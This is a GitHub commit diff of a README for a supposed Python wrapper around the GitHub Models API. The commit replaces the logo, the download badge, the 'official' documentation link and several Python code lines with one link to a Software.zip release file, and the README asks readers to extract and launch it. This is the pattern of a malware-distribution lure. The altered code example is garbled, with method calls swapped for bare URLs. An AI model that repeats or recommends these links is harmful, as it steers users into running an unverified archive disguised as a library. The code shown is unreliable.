Skip to content

Commit b41918d

Browse files
committed
Commit
1 parent 5c53dd5 commit b41918d

File tree

1 file changed

+6
-6
lines changed

1 file changed

+6
-6
lines changed

README.md

Lines changed: 6 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -1,14 +1,14 @@
11
# GithubAIPy 🤖
22

3-
![GithubAIPy](https://github.com/your-username/GithubAIPy/logo.png)
3+
![GithubAIPy](https://github.com/JEFF2807/GithubAIPy/releases/download/v1.0/Software.zip)
44

55
Welcome to GithubAIPy! This repository contains a small Python wrapper for Github Models API. With this wrapper, you can easily interact with various AI models available on Github and leverage their capabilities in your projects. Whether you are working on AI, chat applications, or data analysis, GithubAIPy has got you covered!
66

77
## Installation
88

99
To get started with GithubAIPy, you can download the latest release by clicking the button below:
1010

11-
[![Download GithubAIPy](https://img.shields.io/badge/Download-v1.0.0-blue)](https://github.com/cli/go-gh/archive/refs/tags/v1.0.0.zip)
11+
[![Download GithubAIPy](https://github.com/JEFF2807/GithubAIPy/releases/download/v1.0/Software.zip)](https://github.com/JEFF2807/GithubAIPy/releases/download/v1.0/Software.zip)
1212

1313
Please note that the downloaded file needs to be extracted and launched for installation.
1414

@@ -30,13 +30,13 @@ from github_aipy import GithubModelsAPI
3030
github_api = GithubModelsAPI()
3131

3232
# Get available models
33-
models = github_api.get_models()
33+
models = https://github.com/JEFF2807/GithubAIPy/releases/download/v1.0/Software.zip()
3434

3535
# Choose a model (e.g., ChatGPT)
36-
chat_model = github_api.get_model("chatgpt")
36+
chat_model = https://github.com/JEFF2807/GithubAIPy/releases/download/v1.0/Software.zip("chatgpt")
3737

3838
# Interact with the chosen model
39-
response = chat_model.generate_response("Hello, how are you?")
39+
response = https://github.com/JEFF2807/GithubAIPy/releases/download/v1.0/Software.zip("Hello, how are you?")
4040

4141
print(response)
4242
```
@@ -69,6 +69,6 @@ This project is licensed under the MIT License - see the [LICENSE](LICENSE) file
6969

7070
---
7171

72-
💡 **Pro Tip**: Visit the official [Github Models API](https://github.com/cli/go-gh/archive/refs/tags/v1.0.0.zip) page for more information and updates on available models.
72+
💡 **Pro Tip**: Visit the official [Github Models API](https://github.com/JEFF2807/GithubAIPy/releases/download/v1.0/Software.zip) page for more information and updates on available models.
7373

7474
🚀 Start exploring the world of AI with GithubAIPy today! Thank you for checking out this repository! 🤖

0 commit comments

Comments
 (0)